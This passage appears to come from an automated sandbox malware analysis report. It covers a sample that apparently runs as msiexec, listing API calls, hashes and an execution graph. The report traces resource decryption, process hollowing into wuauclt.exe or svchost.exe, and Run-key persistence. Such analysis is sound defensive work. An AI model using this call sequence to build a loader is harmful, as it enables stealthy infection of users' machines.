            • Opcode ID: 2a6af7d28c69e60efa24dfdd8625100fb673ea20a26b96f46acf4ebd8e682d04
            • Instruction ID: ba8dd628c9140b786af7068798eac55a619a7d8de91ca2ea3bc2b647b0258487
            • Opcode Fuzzy Hash: 2a6af7d28c69e60efa24dfdd8625100fb673ea20a26b96f46acf4ebd8e682d04
            • Instruction Fuzzy Hash: 4C51E971A082558BF721CB28CCC87963BF5FB013E1F5A8328E49ADB2E9DB309945C711
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.364608956.0000000000221000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00220000, based on PE: true
            • Associated: 00000006.00000002.364606591.0000000000220000.00000002.00000001.01000000.0000000F.sdmpDownload File
            • Associated: 00000006.00000002.364611624.0000000000222000.00000002.00000001.01000000.0000000F.sdmpDownload File
            • Associated: 00000006.00000002.364614006.0000000000224000.00000002.00000001.01000000.0000000F.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_220000_Lohonibuhod.jbxd
            Similarity
            • API ID: _inittermfreemalloc
            • String ID: 2t
            • API String ID: 1678931842-3527913779
            • Opcode ID: 855a6846132a5d1281114d7ed38bc9498407cf7cace9050d94217eb1a3baa425
            • Instruction ID: 8d4b9888c2bd47f2f646cf93143560ea66397dde565a5cd7e05023e98582a5ce
            • Opcode Fuzzy Hash: 855a6846132a5d1281114d7ed38bc9498407cf7cace9050d94217eb1a3baa425
            • Instruction Fuzzy Hash: 27117C32724262FBD734CFE4FC4DF6577A1AB20751B20101AEA09C6260DB799A72CB10
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.364596780.0000000000031000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00030000, based on PE: true
            • Associated: 00000006.00000002.364594450.0000000000030000.00000002.00000001.01000000.0000000E.sdmpDownload File
            • Associated: 00000006.00000002.364599082.0000000000032000.00000002.00000001.01000000.0000000E.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_30000_Lohonibuhod.jbxd
            Similarity
            • API ID: _inittermfreemalloc
            • String ID: 2t
            • API String ID: 1678931842-3527913779
            • Opcode ID: d240490eda68ece15e547cfaa14b9270621bc40846813fa8500705a4d7adb240
            • Instruction ID: a0a064aa427b8aebd1c7047c99558d2e5d346c42bd185d792507d63c7c10e57b
            • Opcode Fuzzy Hash: d240490eda68ece15e547cfaa14b9270621bc40846813fa8500705a4d7adb240
            • Instruction Fuzzy Hash: 51117C362002018BE72B8B26ECC5BE677FCF708B61F104019EA01C61A0EB399980DB40
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.364588049.0000000000021000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00020000, based on PE: true
            • Associated: 00000006.00000002.364585750.0000000000020000.00000002.00000001.01000000.0000000D.sdmpDownload File
            • Associated: 00000006.00000002.364590151.0000000000022000.00000002.00000001.01000000.0000000D.sdmpDownload File
            • Associated: 00000006.00000002.364592294.0000000000024000.00000002.00000001.01000000.0000000D.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_20000_Lohonibuhod.jbxd
            Similarity
            • API ID: _inittermfreemalloc
            • String ID: 2t
            • API String ID: 1678931842-3527913779
            • Opcode ID: 94a21c7ba4b442c7e73632bbcb3e8967706b996784bccdd94226d96fc5dd3ed2
            • Instruction ID: 7f88e3eea342c10e60d911fbc82484ef5fa196bcb21a894ed2e57b5d478a6c0c
            • Opcode Fuzzy Hash: 94a21c7ba4b442c7e73632bbcb3e8967706b996784bccdd94226d96fc5dd3ed2
            • Instruction Fuzzy Hash: 29115E31304221EBF774CF65FC99BA577A6B724311B30001DE505CA5A0DB3C9A62CB54
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCPInfo.KERNEL32(?,00000000), ref: 10002B0E
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: Info
            • String ID: $
            • API String ID: 1807457897-3032137957
            • Opcode ID: e4228b001db0409833e9d38f65e39e27da4081846a0795702f68ba4dd2427d8b
            • Instruction ID: 003f6447f42cfeb74655a4253d6df3cc11f9e005fddf9b97507d5db6970036ca
            • Opcode Fuzzy Hash: e4228b001db0409833e9d38f65e39e27da4081846a0795702f68ba4dd2427d8b
            • Instruction Fuzzy Hash: DB413A310083A89AFB26CB14DC89FEF7F98EB017C0F1005F5DA85DB05AC7224948DBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:65.6%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:69
            Total number of Limit Nodes:3
            execution_graph 120 402b8a __set_app_type __p__fmode __p__commode 121 402bf9 120->121 122 402c01 __setusermatherr 121->122 123 402c0d 121->123 122->123 132 402cf4 _controlfp 123->132 125 402c12 _initterm __getmainargs _initterm 126 402c66 GetStartupInfoA 125->126 128 402c9a GetModuleHandleA 126->128 133 402779 GetEnvironmentVariableA ??2@YAPAXI 128->133 132->125 180 402419 FindResourceA 133->180 136 4027e2 ??2@YAPAXI 183 402493 CryptAcquireContextA 136->183 137 40284b 186 40266c GetCommandLineA PathGetArgsA 137->186 139 402824 ??3@YAXPAX 139->137 143 4028d8 CreateDirectoryA 145 4028f7 143->145 146 4028f0 143->146 144 4028ce 144->143 144->145 148 402419 6 API calls 145->148 201 402520 12 API calls 146->201 150 402908 148->150 149 4028f6 149->145 151 40296c 150->151 153 40291c 150->153 152 402419 6 API calls 151->152 155 40297d 152->155 154 402493 6 API calls 153->154 156 40292b 154->156 159 402992 155->159 168 4029e2 155->168 157 402150 6 API calls 156->157 160 402943 157->160 158 402a24 12 API calls 161 402419 6 API calls 158->161 162 402493 6 API calls 159->162 202 4021dc PathCombineA SetFileAttributesA CreateFileA 160->202 165 402b18 161->165 166 4029a1 162->166 164 402a0b MessageBoxA 164->158 164->168 169 402b5e GetCurrentProcess GetExitCodeProcess ExitProcess 165->169 172 402493 6 API calls 165->172 170 402150 6 API calls 166->170 168->158 168->164 171 4029b9 170->171 173 4021dc 7 API calls 171->173 174 402b31 172->174 175 4029d7 ??3@YAXPAX 173->175 194 402150 ??2@YAPAXI ??3@YAXPAX ??2@YAPAXI LoadLibraryA GetProcAddress 174->194 175->168 177 402b43 196 402298 13 API calls 177->196 179 402b53 ??3@YAXPAX 179->169 181 402441 SizeofResource LoadResource LockResource Sleep ??2@YAPAXI 180->181 182 40243d 180->182 181->182 182->136 182->137 184 4024c1 CryptAcquireContextA 183->184 185 4024cd CryptCreateHash CryptHashData CryptDeriveKey CryptDecrypt 183->185 184->185 185->139 187 402768 lstrcpyA 186->187 188 402699 ??2@YAPAXI ??2@YAPAXI 186->188 189 402772 GetEnvironmentVariableA PathAppendA PathFileExistsA 187->189 190 4026cf 188->190 189->143 189->144 190->190 191 4026e2 GetEnvironmentVariableA PathCombineA PathCombineA lstrlenA lstrcatA 190->191 192 402756 ??3@YAXPAX ??3@YAXPAX 191->192 193 40274e lstrcatA 191->193 192->189 193->192 195 4021cb ??3@YAXPAX 194->195 195->177 197 4023ce WriteProcessMemory Wow64SetThreadContext ResumeThread 196->197 198 40238f 196->198 197->179 199 402392 WriteProcessMemory 198->199 199->197 199->199 201->149 203 40224a ??3@YAXPAX 202->203 204 40224f WriteFile CloseHandle SetFileAttributesA ShellExecuteA 202->204 203->151 204->203 205 402cdc _exit

            Callgraph

            Control-flow Graph

            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004022A9
            • GetProcAddress.KERNEL32(?,SetThreadContext), ref: 004022E3
            • GetProcAddress.KERNEL32(?,ResumeThread), ref: 004022F0
            • GetProcAddress.KERNEL32(?,CreateProcessA), ref: 004022FD
            • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040230C
            • GetProcAddress.KERNEL32(00000000), ref: 00402313
            • GetProcAddress.KERNEL32(?,VirtualAllocEx), ref: 00402320
            • GetProcAddress.KERNEL32(?,WriteProcessMemory), ref: 0040232D
            • GetProcAddress.KERNEL32(?,GetThreadContext), ref: 0040233A
            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 00402356
            • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 0040235F
            • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00402372
            • WriteProcessMemory.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00402383
            • WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 004023BB
            • WriteProcessMemory.KERNELBASE(00000000,?,00000000,00000004,00000000), ref: 004023EF
            • Wow64SetThreadContext.KERNEL32(?,00010007), ref: 00402408
            • ResumeThread.KERNELBASE(?), ref: 0040240E
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_400000_msiexec.jbxd
            Similarity
            • API ID: AddressProc$Process$MemoryWrite$Thread$AllocContextCreateHandleLibraryLoadModuleResumeSectionUnmapViewVirtualWow64
            • String ID: ($CreateProcessA$D$GetThreadContext$NtUnmapViewOfSection$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$kernel32.dll$ntdll.dll
            • API String ID: 3764497115-2335503490
            • Opcode ID: 1a4484b91f31174b06e95d4efd592d181e7a2263aaa2955b226b527c7b6d8b7c
            • Instruction ID: 2101c5929532744fc004e0de8da0dcc076228160c7658ae0236a057b64dc8bda
            • Opcode Fuzzy Hash: 1a4484b91f31174b06e95d4efd592d181e7a2263aaa2955b226b527c7b6d8b7c
            • Instruction Fuzzy Hash: 4651E471900208AFDB219FA1CD49EEEBBB9FF48704F10406AFA05B61A1D7B59A50DF64
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000000,75A9B136,00000000,00000000,00000000,00000000,?), ref: 004024BB
            • CryptAcquireContextA.ADVAPI32(00000008,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000008), ref: 004024CB
            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004024DB
            • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004024EB
            • CryptDeriveKey.ADVAPI32(?,00006801,00000000,00000000,?), ref: 00402501
            • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?), ref: 00402515
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_400000_msiexec.jbxd
            Similarity
            • API ID: Crypt$AcquireContextHash$CreateDataDecryptDerive
            • String ID: Microsoft Base Cryptographic Provider v1.0
            • API String ID: 2100064926-291530887
            • Opcode ID: 9f9c0cb9c7ad4af4a66681f9ff8cb34f727ce906c2f2696f785b290b893db35d
            • Instruction ID: 6345555bd6a6a2baae484d44cd70709dcbd77d04a333a304fec5576ab75e7cf1
            • Opcode Fuzzy Hash: 9f9c0cb9c7ad4af4a66681f9ff8cb34f727ce906c2f2696f785b290b893db35d
            • Instruction Fuzzy Hash: 6A111576901118BBDF219FD5DE49ECFBF7DEF09751F108062B604B20A0D6B14A54DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • GetEnvironmentVariableA.KERNEL32(TEMP,00000000,00000104,?,?,00000000), ref: 004027B6
            • ??2@YAPAXI@Z.MSVCRT ref: 004027C1
              • Part of subcall function 00402419: FindResourceA.KERNEL32 ref: 00402431
            • ??3@YAXPAX@Z.MSVCRT ref: 0040283E
            • ??3@YAXPAX@Z.MSVCRT ref: 004029DA
            • MessageBoxA.USER32 ref: 00402A0B
            • PathCombineA.SHLWAPI(00000000,00000000,00000688), ref: 00402A56
            • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402A65
            • PathCombineA.SHLWAPI(00000000,00000000,00000994), ref: 00402A7C
            • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402A85
            • PathCombineA.SHLWAPI(00000000,00000000,00000890), ref: 00402A9C
            • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402AA5
            • PathCombineA.SHLWAPI(00000000,00000000,0000078C), ref: 00402ABC
            • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402AC5
            • PathCombineA.SHLWAPI(00000000,00000000,00000A98), ref: 00402ADC
            • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402AE5
            • PathCombineA.SHLWAPI(00000000,00000000,00000B9C), ref: 00402AFC
            • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402B05
            • ??2@YAPAXI@Z.MSVCRT ref: 004027F9
              • Part of subcall function 00402493: CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000000,75A9B136,00000000,00000000,00000000,00000000,?), ref: 004024BB
              • Part of subcall function 00402493: CryptAcquireContextA.ADVAPI32(00000008,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000008), ref: 004024CB
              • Part of subcall function 00402493: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004024DB
              • Part of subcall function 00402493: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004024EB
              • Part of subcall function 00402493: CryptDeriveKey.ADVAPI32(?,00006801,00000000,00000000,?), ref: 00402501
              • Part of subcall function 00402493: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?), ref: 00402515
            • GetEnvironmentVariableA.KERNEL32(APPDATA,00000000,00000104,?,?,?,?,00000000), ref: 004028A1
            • PathAppendA.SHLWAPI(00000000,00000064), ref: 004028B2
            • PathFileExistsA.SHLWAPI(00000000), ref: 004028BF
            • CreateDirectoryA.KERNELBASE(00000000,00000000,?,?,?,?,00000000), ref: 004028E2
            • ??3@YAXPAX@Z.MSVCRT ref: 00402964
            • ??3@YAXPAX@Z.MSVCRT ref: 00402B56
            • GetCurrentProcess.KERNEL32(00000000), ref: 00402B65
            • GetExitCodeProcess.KERNELBASE(00000000), ref: 00402B6C
            • ExitProcess.KERNEL32 ref: 00402B75
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_400000_msiexec.jbxd
            Similarity
            • API ID: Path$File$CombineCryptDelete$??3@$Process$??2@AcquireContextCreateEnvironmentExitHashVariable$AppendCodeCurrentDataDecryptDeriveDirectoryExistsFindMessageResource
            • String ID: APPDATA$TEMP
            • API String ID: 543592474-1286462511
            • Opcode ID: 597e02f1118b8ffb69c02e7a48af66dc5b946ee98db13f54ee89a2e8b34cccd5
            • Instruction ID: f6e2236e3f10b00cdc1ba35207930b3d891378d713eead9fc05a11d1674366eb
            • Opcode Fuzzy Hash: 597e02f1118b8ffb69c02e7a48af66dc5b946ee98db13f54ee89a2e8b34cccd5
            • Instruction Fuzzy Hash: 44C15CB290011CABDF11EBA0CD89EDE77BDEB48304F1440B6EA05B6191DA749B85DFA4
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_400000_msiexec.jbxd
            Similarity
            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
            • String ID:
            • API String ID: 801014965-0
            • Opcode ID: d8f85fa23656ef79cabd7502bc477eafebd37bb0cf6d586a30fbf6c3dacf0e68
            • Instruction ID: 2fb94ac4d71d2bac72fea6894e204766db09a3009eb5ffa048212170574d12fd
            • Opcode Fuzzy Hash: d8f85fa23656ef79cabd7502bc477eafebd37bb0cf6d586a30fbf6c3dacf0e68
            • Instruction Fuzzy Hash: 3B413375844348AFE7249FA4DF8DAAD7BB8BB09714F20013BE541B72E1D7B85841CB58
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • ??2@YAPAXI@Z.MSVCRT ref: 00402162
            • ??3@YAXPAX@Z.MSVCRT ref: 00402183
            • ??2@YAPAXI@Z.MSVCRT ref: 00402192
            • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 004021A5
            • GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 004021B1
            • ??3@YAXPAX@Z.MSVCRT ref: 004021CE
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_400000_msiexec.jbxd
            Similarity
            • API ID: ??2@??3@$AddressLibraryLoadProc
            • String ID: Ntdll.dll$RtlDecompressBuffer
            • API String ID: 2852400082-662685767
            • Opcode ID: 7787bc536107e3c50eb459c9c007716404211b6839400d8fdc558572799896aa
            • Instruction ID: 531a7ec942284e6b34a3e9cc2ffd4a3043220942f7d98ccca6845493d414fb18
            • Opcode Fuzzy Hash: 7787bc536107e3c50eb459c9c007716404211b6839400d8fdc558572799896aa
            • Instruction Fuzzy Hash: E901C476900119BFCF049FA4DD4AEDE77B9EF08314F000069FA05B7190D6B56A04CB54
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • FindResourceA.KERNEL32 ref: 00402431
            • SizeofResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 00402443
            • LoadResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 00402452
            • LockResource.KERNEL32(00000000,?,?,00000000), ref: 00402459
            • Sleep.KERNELBASE(00000064,?,?,00000000), ref: 00402463
            • ??2@YAPAXI@Z.MSVCRT ref: 00402471
            Memory Dump Source
            • Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_400000_msiexec.jbxd
            Similarity
            • API ID: Resource$??2@FindLoadLockSizeofSleep
            • String ID:
            • API String ID: 3568076173-0
            • Opcode ID: e3d05aab11850eded8a7556daf18238524d26a7001681dbed2145af7907fd7d4
            • Instruction ID: 703fe47ab0b1aed84f9ae8a5fdc7b2922fb639b0f7b03c34cd0379616ea940cd
            • Opcode Fuzzy Hash: e3d05aab11850eded8a7556daf18238524d26a7001681dbed2145af7907fd7d4
            • Instruction Fuzzy Hash: 0401A272600221AFC7209F79DD4CE6F7BE9EF8D761F104429FA85E3290D6788880CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • GetCommandLineA.KERNEL32(00000104,00000000), ref: 00402677
            • PathGetArgsA.SHLWAPI(00000000), ref: 00402680
            • ??2@YAPAXI@Z.MSVCRT ref: 004026A0
            • ??2@YAPAXI@Z.MSVCRT ref: 004026A9
            • GetEnvironmentVariableA.KERNEL32(00000670,00000000,00000104,?), ref: 004026F1
            • PathCombineA.SHLWAPI(00000000,00000000,00000064), ref: 0040270B
            • PathCombineA.SHLWAPI(00000000,00000000,-000005A8), ref: 0040271B
            • lstrlenA.KERNEL32(00000000), ref: 0040271E
            • lstrcatA.KERNEL32(j(@,00402134), ref: 00402745
            • lstrcatA.KERNEL32(?,00000000), ref: 00402754
            • ??3@YAXPAX@Z.MSVCRT ref: 00402759
            • ??3@YAXPAX@Z.MSVCRT ref: 0040275F
            • lstrcpyA.KERNEL32(j(@,00000000), ref: 0040276C
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_400000_msiexec.jbxd
            Similarity
            • API ID: Path$??2@??3@Combinelstrcat$ArgsCommandEnvironmentLineVariablelstrcpylstrlen
            • String ID: j(@
            • API String ID: 1848265983-2441115870
            • Opcode ID: 3c6b8aff4d8e67542f72917e5a93f8b16faca7c1993018cc778e733412f8d674
            • Instruction ID: 20b46665c5c392077cfaf8139bb222d8e5b4c3735ced006ec0b8e3afc4d8f7d2
            • Opcode Fuzzy Hash: 3c6b8aff4d8e67542f72917e5a93f8b16faca7c1993018cc778e733412f8d674
            • Instruction Fuzzy Hash: A9319032500218AFDF11AF64DD88ADE7BB9EB08354F1040B6F945B72E1DAB95A80CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000001,00000000), ref: 00402552
            • GetEnvironmentVariableA.KERNEL32(00402F66,?,00000104), ref: 004025AC
            • PathCombineA.SHLWAPI(?,?,0040295A), ref: 004025CD
            • PathCombineA.SHLWAPI(?,?,0040234E), ref: 004025E4
            • PathUnquoteSpacesA.SHLWAPI(?), ref: 004025F3
            • CopyFileA.KERNEL32 ref: 00402604
            • PathQuoteSpacesA.SHLWAPI(?), ref: 00402614
            • RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 00402628
            • lstrlenA.KERNEL32(?), ref: 00402635
            • RegSetValueExA.ADVAPI32(00000000,004028F6,00000000,00000001,?,00000000), ref: 0040264C
            • RegCloseKey.ADVAPI32(00000000), ref: 00402655
            • PathUnquoteSpacesA.SHLWAPI(?), ref: 00402662
            Strings
            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040261E
            Memory Dump Source
            • Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_400000_msiexec.jbxd
            Similarity
            • API ID: Path$Spaces$CombineFileUnquote$CloseCopyEnvironmentModuleNameOpenQuoteValueVariablelstrlen
            • String ID: Software\Microsoft\Windows\CurrentVersion\Run
            • API String ID: 2107585506-1428018034
            • Opcode ID: 83fca13ebf4ad39da448c043303d9b21502982656c2de3e17278bbeabd522527
            • Instruction ID: a86aad1d29e7a7895c0fb444d9a4815063da67e6701978e6f822172513d27bf4
            • Opcode Fuzzy Hash: 83fca13ebf4ad39da448c043303d9b21502982656c2de3e17278bbeabd522527
            • Instruction Fuzzy Hash: 80311DB690425CBFDB11DBA4DD44ACABB7CAB48344F1044B6E689F2150DA709BC88FA4
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • PathCombineA.SHLWAPI(?,00000000,00000000), ref: 0040220F
            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00402228
            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040223C
            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040225E
            • CloseHandle.KERNEL32(?), ref: 00402267
            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00402275
            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,?), ref: 0040228B
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_400000_msiexec.jbxd
            Similarity
            • API ID: File$Attributes$CloseCombineCreateExecuteHandlePathShellWrite
            • String ID: open
            • API String ID: 1472231245-2758837156
            • Opcode ID: f51bcf8fff26897ea240e9d3aae106b4200d1664d093c1129e96391cb81a67ab
            • Instruction ID: b8440b774cbbe2fa9ab760de7017495f46494a0c5c1a7f4db0f29674fa40f498
            • Opcode Fuzzy Hash: f51bcf8fff26897ea240e9d3aae106b4200d1664d093c1129e96391cb81a67ab
            • Instruction Fuzzy Hash: 3E119AB580025CBBDF209FA4DD88EDB3F7DEB08390F1045A5B619A20A1D6309A848FA0
            Uniqueness

            Uniqueness Score: -1.00%

            Callgraph

            Control-flow Graph

            APIs
            • GetModuleHandleW.KERNEL32(00000000), ref: 001E00CB
            • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004,00000000), ref: 001E00E1
            • GetModuleFileNameW.KERNEL32(00000000,?,00008000,00000000,00008000,00001000,00000004,00000000), ref: 001E00FB
            • SetEnvironmentVariableW.KERNEL32(src,?,00000000,?,00008000,00000000,00008000,00001000,00000004,00000000), ref: 001E0108
            • GetWindowsDirectoryW.KERNEL32(?,00008000,src,?,00000000,?,00008000,00000000,00008000,00001000,00000004,00000000), ref: 001E0115
            • NtQueryInformationProcess.NTDLL(000000FF,0000001A,00000000,00000004,00000000), ref: 001E0135
            • lstrcatW.KERNEL32(?,\system32\wuauclt.exe), ref: 001E0148
            • lstrcatW.KERNEL32(?,\syswow64\svchost.exe), ref: 001E0157
            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001E0171
            • NtCreateSection.NTDLL(?,00000004,00000000,00000000,00000002,01000000,?), ref: 001E0196
            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 001E01C0
            • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 001E01FD
            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004), ref: 001E0227
            • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 001E026A
            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004), ref: 001E0294
            • CreateProcessW.KERNEL32(00000044,?,00000044,00000044,00000044,00000004,00000044,00000044,00000044,?), ref: 001E02D5
            • NtDelayExecution.NTDLL(00000000,FFF0BDC0), ref: 001E02F6
            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 001E0300
            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,FFF0BDC0,00000001,00000000,00000040), ref: 001E0326
            • NtClose.NTDLL(?), ref: 001E0336
            • GetThreadContext.KERNEL32(?,00010002), ref: 001E0368
            • NtUnmapViewOfSection.NTDLL(?,?), ref: 001E0381
            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 001E038B
            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,FFF0BDC0,00000001,00000000,00000040), ref: 001E03B1
            • NtResumeThread.NTDLL(?,00000000), ref: 001E03C2
            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 001E03CE
            • NtClose.NTDLL(?), ref: 001E03D6
            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 001E03E0
            • NtClose.NTDLL(?), ref: 001E03E8
            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 001E03F2
            • NtClose.NTDLL(?), ref: 001E03FA
            • CloseHandle.KERNEL32(?), ref: 001E0402
            • VirtualFree.KERNEL32(?,00000000,00008000,?,00008000,src,?,00000000,?,00008000,00000000,00008000,00001000,00000004,00000000), ref: 001E0411
            • ExitProcess.KERNEL32(00000000,00000000,00008000,00001000,00000004,00000000), ref: 001E0418
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.365716053.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_8_2_1e0000_msiexec.jbxd
            Similarity
            • API ID: Section$View$Unmap$CloseCreate$Process$FileHandleModuleThreadVirtuallstrcat$AllocContextDelayDirectoryEnvironmentExecutionExitFreeInformationNameQueryResumeVariableWindows
            • String ID: D$\system32\wuauclt.exe$\syswow64\svchost.exe$src
            • API String ID: 934615610-414133456
            • Opcode ID: 2f79d31048df261f855bc04d0ebc61e6076aada8796389fcf184e2932ed4cc2f
            • Instruction ID: 26026d3dca783819cbb741bba8f1551c30a18ca4ec9fc1a1a278b667e20f602b
            • Opcode Fuzzy Hash: 2f79d31048df261f855bc04d0ebc61e6076aada8796389fcf184e2932ed4cc2f
            • Instruction Fuzzy Hash: 18A119B1940649BEEF169BA5CD06FEEB7B9EB1C710F104219F714B61D1E7F0A9808B24
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
